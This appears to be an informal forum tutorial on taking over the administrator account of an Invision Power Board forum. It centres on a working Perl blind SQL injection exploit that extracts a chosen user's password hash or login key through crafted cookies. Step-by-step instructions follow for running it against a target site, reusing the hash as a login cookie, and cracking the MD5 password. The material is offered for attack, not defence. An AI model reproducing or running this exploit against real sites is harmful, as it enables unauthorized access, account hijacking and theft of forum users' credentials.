HACKING FORUM

Hacking Forums

First of all, what you guyz need is a forum to hack. Once you got the forum the next step is to find the user we want to hack. In common sense i can say that u want to hack the admin . The administrator is usually the first member of the forum, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "3".

Now you are almost all set to go bcz you guyz know the site u wish to hack, and the member/administrator you wish to hack. For e.g "you are hacking the administrator of "http://www.xxxxxxxx.com", which is User ID "3".

Now before dreams come true u need a nice exploit. U can use this one given below ( preferably, for 1.3.1 forums)

---

#!/usr/bin/perl -w
##################################################################
# This expoit works fine. Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Hacker"
##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
{
print "..By Hacker. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].

";
exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current
";
last;
}

}
if ( length($outputs) < 1 ) { print "Not Exploitable!
"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;

# Hacker

---

#For using the above perl script u need an activeperl. You can get it from here if u didn't hv the one and install it: -
http://shorl.com/gakadupofugo

#Now u hv perl installed in ur system. Open your Notepad -> copy the above perl script and paste it there -> save it as ipb.pl

#Now go to C:perlin and paste your ipb.pl file there.

#Now u r almost done.

#Open your Command prompt(start->run->cmd->hit enter)

#Now change your directory to perl by typing cd C:Perlin in ur command prompt

#Now u r in perl's bin directory. Now all u need to do is to access the ipb.pl file that u saved in bin directory

#For this type the command : -perl ipb.pl

#Now your exploit is executed. Let's celebrate


Now it's time to tell u how to use it.

#I think u guys remember that u r hacking site User ID "3" who is the administrator of site "http://www.xxxxxxxx.com"

#Go to your command prompt (run->cmd) and type this into ur command prompt : -

ipb.pl http://www.xxxxxxxx.com/ 3 1

#It may takes some time as the exploit gathers the information and grab the "hash"

#Don't close the programme if it takes some time bcz this is the finalisation phase which gives u the way to access the forum with admin privilages.

#Once the hash grabbing is complete, u r returned with full hash and UserID

#Now once u got the hash For e.g 8476t3f6534ty3bt6k6g6f4fj3jb1h0m

#Don't confuse with these numbers, it's useless unless u know how to use it.

#This is nothing but the admin's password encrypted by using theMD5 hash algorithm

#I think most of u heard that MD5 hash is impossible to crack. MD5s are impossible to reverse "once a string is MD5ed, there is no way to get it back to plain-text"

#It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash (as i already cracked MD5 hash, so it's not impossible)

#You can use any method, and any crackers to crack this hash

#Once you r done i.e u hv cracked the hash, you will be given a plain-text password (which is your gateway to enter the forum)